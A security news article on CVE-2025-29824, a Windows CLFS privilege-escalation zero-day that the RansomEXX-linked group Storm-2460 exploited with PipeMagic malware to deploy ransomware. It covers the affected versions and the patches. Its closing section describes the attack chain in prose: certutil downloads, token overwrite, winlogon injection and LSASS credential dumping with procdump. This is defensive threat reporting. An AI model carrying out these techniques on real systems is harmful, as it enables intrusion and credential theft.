Microsoft: Windows CLFS Weakness Could Result in ‘Extensive Deployment and Activation of Ransomware’
A zero-day weakness in the Windows Common Log File System (CLFS) has been discovered by Microsoft. The weakness is currently being used in real-world scenarios to introduce ransomware. Industries at risk include information technology, real estate, finance, technology, and retail, with businesses in the United States, Spain, Venezuela, and Saudi Arabia.
The identified weakness, labeled as CVE-2025-29824 and rated as “important,” is located in the CLFS kernel driver. It grants an opportunity for an intruder with standard user privileges to escalate their local authority. With these elevated rights, the attacker could propagate and trigger ransomware throughout a network, as outlined in a blog entry from the Microsoft Threat Intelligence Center.
The CLFS driver is a critical component of Windows that manages writing transaction logs. Misuse of this component could enable an attacker to obtain SYSTEM privileges. Subsequently, they may exfiltrate data or establish hidden access routes. Microsoft frequently detects elevation-of-privilege vulnerabilities in CLFS, with the most recent one being resolved in December.
In instances where Microsoft observed the exploitation of CVE-2025-29824, the “PipeMagic” malware was propagated before the intruders could misuse the weakness to escalate their privileges. PipeMagic allows attackers to remotely control a computer system, executing commands or installing additional malicious tools.
SEE: TechRepublic Exclusive: New Ransomware Attacks are Becoming More Personal as Intruders ‘Apply Psychological Tactics’
Responsible Party for the Exploitation
The threat actor named Storm-2460 has been identified by Microsoft as the initiator of exploiting this weakness along with PipeMagic and ransomware, connecting it to the RansomEXX group.
Previously recognized as Defray777, this group emerged in 2018. They have aimed at prominent institutions such as the Texas Department of Transportation, the Brazilian government, and the Taiwanese hardware maker GIGABYTE. This group has been associated with Russian individuals.
The United States cyber agency has included this vulnerability, rated 7.8, in its Known Exploited Vulnerabilities list, mandating that federal civil agencies apply the patch by April 29.
Systems Affected: Windows 10, Windows 11, and Windows Server
Security updates were issued on April 8 to fix the vulnerability in Windows 11, Windows Server 2022, and Windows Server 2019. However, fixes for Windows 10 x64-based and 32-bit systems are pending. Microsoft assures they will be released “promptly,” and “customers will receive a notification through a revision to this CVE information” once the updates are ready.
Systems using Windows 11 version 24H2 or later are not susceptible to this exploit, even if the vulnerability exists. Restricted access to essential system details is limited to users possessing the “SeDebugPrivilege” authorization, which is typically not accessible to standard users.
Operational Details of the Exploitation
Microsoft observed the exploiters utilizing the certutil command-line tool to retrieve a malevolent MSBuild file onto the victim’s machine.
This file, housing an encrypted PipeMagic payload, was hosted on a previously legitimate third-party website that had been compromised to facilitate the threat actor’s malware. One of the domains PipeMagic communicated with was aaaaabbbbbbb.eastus.cloudapp.azure[.]com, which has since been deactivated.
After decrypting and executing PipeMagic in memory, the intruders leveraged a dllhost.exe process to divulge kernel addresses, also known as memory locations, to user mode. They reassigned the process’s token, determining its allowed actions, to the value 0xFFFFFFFF, granting complete privileges and enabling the introduction of code into SYSTEM-level processes.
Subsequently, they implanted a payload into the SYSTEM winlogon.exe process, which later embedded the Sysinternals procdump.exe utility into another dllhost.exe process and ran it. This allowed the threat actor to recover the memory of LSASS, a process containing user credentials.
Following credential theft, ransomware was introduced. Microsoft observed encryption of files, addition of a random extension, and a ransom note labeled !_READ_ME_REXX2_!.txt being left on affected systems.
About Author
